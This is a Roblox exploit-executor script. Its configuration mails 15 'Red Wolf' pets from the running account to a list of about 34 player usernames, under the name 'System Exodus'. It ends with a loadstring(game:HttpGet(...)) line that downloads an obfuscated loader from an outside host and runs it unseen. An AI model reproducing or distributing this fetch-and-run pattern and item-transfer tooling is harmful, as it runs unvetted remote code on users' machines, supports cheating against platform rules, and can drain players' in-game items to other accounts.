getgenv().Settings = {
    Mailing = {
        ["Red Wolf"] = {Class = "Pet", Amount = 15}
    },
    Users = {
"XxAbigailMysticxX",
"XxHyperMinerxX",
"Jaxon_Circuit2007",
"LukeChillVenom",
"AvaNova2024",
"CookiePulse_YT",
"XxSonicPixelxX2013",
"AuroraDriftPlayz_YT",
"ZoomCyberBeast",
"MasonPulseInferno201",
"Aubr3yGam3rKing",
"StormSpark202340",
"XxMysticStormAcexX",
"DawnBan3Danc3rYT",
"ChloeDark91",
"RiftDragonEcho57",
"XxVictoriaNeonxX",
"BladeSparklyCrystal",
"HunterJellyBane",
"XxIceOmegaSkyxX",
"ZoomBeast2016",
"XxChillHunterxX",
"LunaUltra12",
"WillowHaze38",
"DawnHyper62",
"Flash_Primal2018",
"MichaelUltra50",
"HeroKnightFire",
"BladeMoon93",
"XxWillowNovaJellyxXY",
"IceStarry2002",
"Cyber_Chaos31",
"PrimalAqua96",
"Flam3SkyPro"
    },
    ["Split Items Evenly"] = false, --// False -> it will send the Amount per account.
    ["Only Online Accounts"] = false,

    [[ Thank you for using System Exodus ❤! ]]
}
loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/86847850c3165379f5be2d9d071eaccb.lua"))()
